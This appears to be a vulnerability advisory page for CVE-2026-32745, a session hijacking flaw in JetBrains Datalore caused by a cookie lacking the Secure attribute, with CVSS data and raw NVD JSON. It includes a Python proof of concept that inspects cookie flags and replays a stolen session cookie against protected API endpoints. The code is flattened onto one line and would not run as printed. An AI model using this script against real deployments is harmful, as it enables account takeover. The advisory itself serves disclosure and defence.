Security Vulnerability Report
CVE-2026-32745 CVSS 6.3 MEDIUM

CVE-2026-32745

Published: 2026-03-13 19:55:10
Last Modified: 2026-04-02 14:55:22

Description

In JetBrains Datalore before 2026.1, session hijacking was possible because a cookie was set without the Secure attribute (CWE-614, Sensitive Cookie Without 'Secure' Attribute; CWE-319, Cleartext Transmission of Sensitive Information). A cookie lacking the Secure attribute is sent by the browser over plain HTTP as well as HTTPS, so an attacker positioned on the same network (AV:A) who can induce or observe a plaintext request (UI:R) can capture it and replay the session.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N (JetBrains secondary scoring; the NVD primary vector is CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N, base 5.7 MEDIUM — both appear in the raw JSON below)

Configurations (Affected Products)

cpe:2.3:a:jetbrains:datalore:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains Datalore < 2026.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note what it does and does not establish: it inspects the cookie attributes on a single unauthenticated response and replays a cookie you already hold; it does not capture traffic, and a missing Secure attribute alone is a finding, not a confirmed compromise, unless an attacker-reachable plaintext HTTP path to the deployment exists.
python
# CVE-2026-32745 PoC - JetBrains Datalore Session Hijacking # This PoC demonstrates the session hijacking vulnerability due to missing Secure cookie attribute import requests import argparse from http.cookiejar import CookieJar import urllib.parse def check_cookie_security(url): """ Check if the Datalore application sets cookies without Secure attribute """ session = requests.Session() response = session.get(url) print(f"[*] Checking cookie settings for: {url}") print(f"[*] Response status: {response.status_code}") # Check for JSESSIONID or other session cookies session_cookies = ['JSESSIONID', 'SESSION', 'SESSIONID', 'PHPSESSID'] vulnerable_cookies = [] for cookie in session.cookies: print(f"\n[+] Cookie Name: {cookie.name}") print(f"[+] Cookie Value: {cookie.value[:20]}...") print(f"[+] Cookie Domain: {cookie.domain}") print(f"[+] Cookie Secure Flag: {cookie.has_nonstandard_attr('Secure') or cookie.secure}") # Check if it's a session cookie without Secure flag if any(session_name.lower() in cookie.name.lower() for session_name in session_cookies): if not cookie.secure: vulnerable_cookies.append(cookie.name) print(f"[!] 
VULNERABLE: {cookie.name} is missing Secure attribute!") return vulnerable_cookies def simulate_session_hijacking(target_url, cookie_name, cookie_value): """ Simulate session hijacking by using stolen cookie """ print(f"\n[*] Simulating session hijacking...") # Create a new session with the stolen cookie hijacked_session = requests.Session() hijacked_session.cookies.set(cookie_name, cookie_value, domain='target_domain') # Try to access protected resources protected_endpoints = [ '/api/user/profile', '/api/workspaces', '/api/computations', '/dashboard' ] for endpoint in protected_endpoints: try: response = hijacked_session.get(target_url + endpoint) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f"[+] Response length: {len(response.content)} bytes") elif response.status_code == 401: print(f"[-] Unauthorized: {endpoint}") else: print(f"[*] Status {response.status_code} for: {endpoint}") except Exception as e: print(f"[!] Error accessing {endpoint}: {str(e)}") def main(): parser = argparse.ArgumentParser(description='CVE-2026-32745 PoC') parser.add_argument('-u', '--url', required=True, help='Target Datalore URL') parser.add_argument('-c', '--cookie', help='Stolen cookie name=value') args = parser.parse_args() # Check for vulnerable cookies vulnerable = check_cookie_security(args.url) if vulnerable: print(f"\n[!] Found {len(vulnerable)} vulnerable session cookie(s)") print("[!] This indicates the application may be vulnerable to session hijacking") print("[!] Attackers on the same network could intercept these cookies via HTTP") else: print("\n[+] No vulnerable cookies detected (or all cookies have Secure flag)") # If cookie provided, simulate hijacking if args.cookie: parts = args.cookie.split('=') if len(parts) == 2: simulate_session_hijacking(args.url, parts[0], parts[1]) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32745", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:09.983", "lastModified": "2026-04-02T14:55:21.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Datalore before 2026.1 session hijacking was possible due to missing secure attribute for cookie settings"}, {"lang": "es", "value": "En JetBrains Datalore antes de 2026.1 el secuestro de sesión era posible debido a la falta del atributo seguro para la configuración de cookies."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-614"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:datalore:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1", "matchCriteriaId": 
"54F3034A-2ADD-4FE7-8CAD-A70B4FC2F6FF"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}